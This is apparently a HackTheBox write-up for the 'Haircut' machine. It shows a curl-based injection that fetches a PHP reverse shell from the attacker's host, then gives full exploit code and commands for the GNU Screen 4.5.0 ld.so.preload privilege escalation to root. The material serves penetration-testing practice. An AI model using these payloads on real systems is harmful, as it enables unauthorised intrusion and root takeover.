Summary

Haircut is a medium Linux box. It can be exploited by properly brute-forcing for files and directories on the webserver. This will lead to an exposed php file that is executing and loading files with curl which can be abused by downloading a php reverse shell. The privileges can be escalated by abusing a vulnerable SUID binary which will provide a root shell.

Discovery

Started off by running NmapAutomator.
Nmap discovered the following open ports and services:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e9:75:c1:e4:b3:63:3c:93:f2:c6:18:08:36:48:ce:36 (RSA)
|   256 87:00:ab:a9:8f:6f:4b:ba:fb:c6:7a:55:a8:60:b2:68 (ECDSA)
|_  256 b6:1b:5c:a9:26:5c:dc:61:b7:75:90:6c:88:51:6e:54 (ED25519)
80/tcp open  http    nginx 1.10.0 (Ubuntu)
|_http-server-header: nginx/1.10.0 (Ubuntu)
|_http-title:  HTB Hairdresser 
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The webserver is of interest since SSH seems to be fairly new and 7.2 does not have any major vulnerabilities. The webserver did not show much initially so it made sense to brute-force for files and directories. By using the following wordlist:

/home/user/wordlists/directory-list-lowercase-2.3-medium.txt

You will find the following files and directories:

http://10.129.129.32/uploads (Status: 301)
http://10.129.129.32/exposed.php (Status: 200)

The uploads directory does not have directory listing enabled and further brute-forcing did not yield in any new file or directory discoveries. The exposed.php file is interesting. It looked as follows: The webserver contained the following image:

This is very interesting as it seems to curl for any webpage and include it in exposed.php. Initially, I thought the exploitation method would be command injection but several payloads showed that this input was properly validated and any attempts would be denied.

Exploitation

It was found that you can download files with curl to the server. However, since you cannot retrieve them from /tmp for example this requires you to go back to your initial enumeration, the uploads directory. The trick is that you can use curl to download a reverse shell and store the output in the uploads directory. It is important to store it in the uploads directory because the exposed.php includes it which causes problems when executing your reverse shell. So, use the following curl command in burp (make sure to URL encode this with SHIFT+U):

POST /exposed.php HTTP/1.1
Host: 10.129.129.32
[...]

formurl=http%3a//10.10.14.147/php-reverse-shell.php+-o+uploads/shell.php&submit=Go

This will create the file in the uploads directory. Now you can curl the file and you will receive a shell back:

curl http://10.129.129.32/uploads/shell.php

This will give you access to the user.txt

Privilege Escalation

Linpeas finds an uncommon SUID Binary: This color coding indicates that it is most likely exploitable. It stands out due to the version number and being an uncommon SUID binary. Searchsploit has an exploit for it:

searchsploit screen priv
------------------------------------------------- ---------------------------------
 Exploit Title                                   |  Path
------------------------------------------------- ---------------------------------
GNU Screen 4.5.0 - Local Privilege Escalation    | linux/local/41154.sh
GNU Screen 4.5.0 - Local Privilege Escalation (P | linux/local/41152.txt

The exploitation is a little bit tricky as it doesn’t work right off the bat. You will have to compile the files locally and then transfer them over due to some compilation error on the server. This can be done by following the steps from the exploit. So, create the following file:

cat << EOF > /tmp/libhax.c

#include 
#include 
#include 
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF

Now you can compile it with:

gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c

And the next file to create is:

cat << EOF > /tmp/rootshell.c

#include 
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
EOF

Compile that as well:

gcc -o /tmp/rootshell /tmp/rootshell.c

Now, copy over these files with wget from your local machine to the target server. Finally, you can execute the following commands, in sequence, to obtain a root shell:

cd /etc
umask 000
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
screen -ls
/tmp/rootshell

This will present you with a root shell if done correctly:

Conclusion

I really enjoyed this box, probably my favorite HTB machine as of yet. I really liked the method to get an initial shell and the privesc not working instantly is also a nice challenge. It seems to be very familiar to machines from the PWK / OSCP and this is therefore definitely a good box to practice. Hope you enjoyed this writeup!